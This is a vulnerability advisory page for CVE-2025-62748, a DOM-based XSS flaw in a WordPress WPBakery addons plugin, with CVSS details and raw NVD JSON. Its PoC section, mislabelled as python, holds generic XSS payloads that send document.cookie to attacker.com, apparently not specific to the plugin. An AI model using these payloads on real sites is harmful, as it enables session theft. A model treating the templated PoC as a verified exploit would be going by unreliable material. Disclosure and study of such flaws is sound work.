Security Vulnerability Report
中文
CVE-2025-62748 CVSS 6.5 MEDIUM

CVE-2025-62748

Published: 2025-12-31 12:16:18
Last Modified: 2026-04-23 15:34:40

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Genetech Products Web and WooCommerce Addons for WPBakery Builder vc-addons-by-bit14 allows DOM-Based XSS.This issue affects Web and WooCommerce Addons for WPBakery Builder: from n/a through <= 1.5.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Web and WooCommerce Addons for WPBakery Builder (vc-addons-by-bit14) <= 1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-62748 DOM-based XSS PoC --> <!-- 攻击者构造恶意链接,诱导已登录用户点击 --> <!-- 方式1: 通过URL参数注入 --> <a href="https://target-site.com/?vc_action=[恶意JavaScript代码]">点击查看详情</a> <!-- 方式2: 通过DOM操作触发 --> <script> // 恶意JavaScript payload示例 const maliciousPayload = '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">" />'; // 攻击者将maliciousPayload注入到插件的DOM处理流程中 // 当页面加载时,恶意代码会在用户浏览器中执行 </script> <!-- 实际利用示例 --> <!-- 窃取用户Cookie --> <img src=x onerror="document.location='https://attacker.com/log?c='+document.cookie"> <!-- 关键点:攻击者需要诱导用户访问特制链接或页面 --> <!-- 攻击成功后会话Cookie将被发送到攻击者服务器 -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62748", "sourceIdentifier": "[email protected]", "published": "2025-12-31T12:16:18.097", "lastModified": "2026-04-23T15:34:40.070", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Genetech Products Web and WooCommerce Addons for WPBakery Builder vc-addons-by-bit14 allows DOM-Based XSS.This issue affects Web and WooCommerce Addons for WPBakery Builder: from n/a through <= 1.5."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('Cross-site Scripting') vulnerabilidad en los Complementos Web y WooCommerce de Genetech Products para WPBakery Builder permite XSS basado en DOM. Este problema afecta a los Complementos Web y WooCommerce para WPBakery Builder: desde n/a hasta 1.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/vc-addons-by-bit14/vulnerability/wordpress-web-and-woocommerce-addons-for-wpbakery-builder-plugin-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}